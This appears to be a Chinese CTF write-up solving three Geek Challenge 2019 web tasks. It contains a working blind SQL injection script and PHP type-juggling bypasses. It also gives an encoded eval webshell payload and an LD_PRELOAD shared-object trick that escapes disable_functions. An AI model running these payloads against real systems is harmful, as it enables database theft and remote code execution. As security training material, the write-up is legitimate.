极客大挑战 2019

Web

BuyFlag

通过查看 index.php 源代码可以发现 pay.php，通过查看 pay.php 源代码可以发现以下内容

if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}

通过构造 payload password="404" 发现并没有什么反应，然后继续在 NetWork 里面寻找答案。在寻找的过程中，发现 Request Headers 内包含 Cookie user=0 ，故尝试修改为 user=1 后出现新提示 Wrong Password。因此重新构造 payload password=404a 发现成功力，但是提示需要给钱（

is_numeric() 函数用于检测变量是否为数字或数字字符串
但当一个整型和一个其他类型行比较的时候，会先把其他类型数字化再比，因此可以通过空字符 %00 或字母实现绕过
strcmp() 函数用于比较两个字符串
若传入的参数为数组则返回 NULL ，NULL==0 为 bool(true)，因此可以通过传入数组进行绕过

尝试构造 payload money=100000000 发现提示 Nember lenth is too long，故修改 payload 为 money[]=1

FinalSQL

通过测试发现并不存在单双引号，空格、and 也被过滤了，/**/ 绕过也不行，并不存在报错注入，尝试布尔注入。

import time
import requests

url = 'http://f5e437d3-ba10-41e1-a677-dab0531a7037.node4.buuoj.cn:81/search.php'
results = []
session = requests.Session()

for i in range(1,43):
    start = 32
    end = 127
    for j in range(start, end):
        mid = (start + end) // 2
        data = {"id": f"0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{i},1))>{mid})"}
        time.sleep(0.1)
        ret = session.get(url, params=data)
        #print(ret.text)
        if 'NO!' in ret.text:
            start = mid
        else:
            end = mid
        if (end - start) <= 1:
            results.append(chr(end))
            print(''.join(results))
            break

可以得到表名 F1naI1y,Flaaaaag ，通过修改 data 如下

data = {"id": f"0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),{i},1))>{mid})"}

可以得到列名 id,fl4gawsl ，通过修改 data 如下

data = {"id": f"0^(ascii(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),{i},1))>{mid})"}

得到回显 NO!!Not!this!!Click!others~~~,yingyingying ，看来被骗了，那就修改 data 如下

data = {"id": f"0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),{i},1))>{mid})"}

得到回显 id,username,password ，通过修改 data 如下

data = {"id": f"0^(ascii(substr((select(group_concat(username))from(F1naI1y)),{i},1))>{mid})"}

得到回显 mygod,welcome,site,site,site,site,Syc,finally,flag ，看来离成功更进一步了（确信），修改 data 如下

data = {"id": f"0^(ascii(substr((select(group_concat(password))from(F1naI1y)where(username='flag')),{i},1))>{mid})"}

得到回显 flag{301e4296-b8db-462e-a4e0-6253e9b8dafe} 。

RCE ME

题目如下。

<?php
error_reporting(0);
if(isset($_GET['code'])){
    $code=$_GET['code'];
    if(strlen($code)>40){
        die("This is too Long.");
    }
    if(preg_match("/[A-Za-z0-9]+/",$code)){
        die("NO.");
    }
    @eval($code);
}else{
    highlight_file(__FILE__);
}
// ?>

限制条件如下：

Payload 长度不超过 40 ；
Payload 不包含数字和字母。

因此尝试用取反 URLEncode 编码绕过，通过以下方式构造 Payload 。

echo urlencode(~"assert");
// %9E%8C%8C%9A%8D%8B
echo urlencode(~'eval($_POST[1]);');
// %9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%C4
// Payload: code=(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%C4);

即可通过蚁剑发现文件 readflag ，但是它是一个文件并且通过蚁剑的 shell 无法执行，猜测需要绕过 disable functions ，先构造 Payload 如下来找出 disable functions 的值。

echo urlencode(~"phpinfo");
// %8F%97%8F%96%91%99%90
// Payload: code=(~%8F%97%8F%96%91%99%90)();

可以得到被禁用的方法如下：

pcntl_alarm
pcntl_fork
pcntl_waitpid
pcntl_wait
pcntl_wifexited
pcntl_wifstopped
pcntl_wifsignaled
pcntl_wifcontinued
pcntl_wexitstatus
pcntl_wtermsig
pcntl_wstopsig
pcntl_signal
pcntl_signal_get_handler
pcntl_signal_dispatch
pcntl_get_last_error
pcntl_strerror
pcntl_sigprocmask
pcntl_sigwaitinfo
pcntl_sigtimedwait
pcntl_exec
pcntl_getpriority
pcntl_setpriority
pcntl_async_signals
system
exec
shell_exec
popen
proc_open
passthru
symlink
link
syslog
imap_open
ld
dl

可以利用环境变量 LD_PRELOAD 劫持系统函数，让外部程序加载恶意 *.so ，达到执行系统命令的效果，先编写恶意类如下。

// ld.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

__attribute__ ((__constructor__)) void angel (void){
    unsetenv("LD_PRELOAD");
    system("/readflag > /tmp/readflag");
}

通过以下命令进行编译为共享对象。

gcc -shared -fPIC ld.c -o ld.so

将该恶意文件上传至 /tmp 中，并构造 Payload 如下。

params: code=(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%C4);
body: 1=putenv("LD_PRELOAD=/tmp/ld.so");mail("","","","");

之后就能在蚁剑通过查看 /tmp/readflag 得到 flag 。

PreviousCISCN 2019 Next安洵杯 2019

Last updated 1 year ago